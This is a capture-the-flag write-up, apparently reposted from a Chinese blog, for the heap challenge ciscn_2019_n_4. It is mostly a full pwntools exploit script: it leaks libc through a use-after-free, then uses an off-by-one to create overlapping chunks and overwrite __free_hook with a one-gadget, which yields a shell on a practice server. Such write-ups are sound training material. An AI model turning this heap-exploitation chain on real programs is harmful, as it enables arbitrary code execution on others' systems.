ciscn_2019_n_4

漏洞点还挺多的

uaf+off-by-one

通过 UAF 泄露 libc，通过 off-by-one 达成 overlap，再 double free 劫持 free_hook 即可

from pwn import *

# Target connection. The local-process line is kept commented for offline
# runs; by default the script talks to the remote CTF instance.
# p = process('./ciscn_2019_n_4')
p = remote('node3.buuoj.cn', 25496)
# NOTE(review): presumably the libc the hard-coded offsets further down
# were taken from — confirm it matches the remote instance.
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
# Menu prompt text; defined here but not referenced by the helpers below.
text = 'Your choice :'
def add(size, content):
    """Menu option 1: allocate a note of ``size`` bytes and fill it with ``content``.

    ``content`` may be ``str`` or ``bytes``; it is passed through to pwntools unchanged.
    """
    send = p.sendlineafter
    send(':', '1')
    send(' ?', str(size))
    send('nest?', content)

def edit(idx, content):
    """Menu option 2: overwrite the note at ``idx`` with ``content``.

    The binary decides how many bytes are accepted; this helper only
    sends what it is given.
    """
    send = p.sendlineafter
    send(':', '2')
    send(' :', str(idx))
    send('nest?', content)

def show(idx):
    """Menu option 3: ask the program to print the note at ``idx``.

    The response is left in the tube for the caller to read.
    """
    send = p.sendlineafter
    send(':', '3')
    send('Index :', str(idx))

def delete(idx):
    """Menu option 4: free the note at ``idx``."""
    send = p.sendlineafter
    send(':', '4')
    send('Index :', str(idx))

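# ---- stage 1: libc leak through the use-after-free (see writeup above) ----
add(0x410, 'p')  # 0
add(0x10, 'p')   # 1

delete(0)
add(0x18, 'ppppppp')  # 0: re-allocated at the same index after the free
show(0)
print(hex(libc.symbols['__malloc_hook']))  # symbol offset, printed before the base is known
# Fix: the page lost its backslashes ('x7f', b'x00'). With a 3-byte fill
# bytes.ljust() raises TypeError, so the script could never get past here.
leak = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc.address = leak - 1120 - libc.symbols['__malloc_hook']

# ---- stage 2: off-by-one -> overlapping chunks -> double free (per writeup) ----
add(0x10, 'p')  # 2
add(0x10, 'p')  # 3
add(0x10, 'p')  # 4

one = libc.address + 0x4f322  # one-gadget offset for the libc loaded above; not verified here
free_hook = libc.symbols['__free_hook']
# Note 0 was allocated with 0x18 bytes but 0x19 are written: this is the
# off-by-one the writeup relies on. b'\x81' was 'x81' on the page (lost backslash).
edit(0, b'z' * 0x10 + p64(0x40) + b'\x81')  # 0
print(hex(libc.address))
delete(2)
delete(3)
add(0x71, b'p' * 0x18 + p64(0x21) + p64(free_hook))  # 2
delete(2)
add(0x10, 'p')
add(0x10, p64(one))
# gdb.attach(p)  # debugging toggle
p.interactive()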
原文地址:https://www.cnblogs.com/pppyyyzzz/p/14514657.html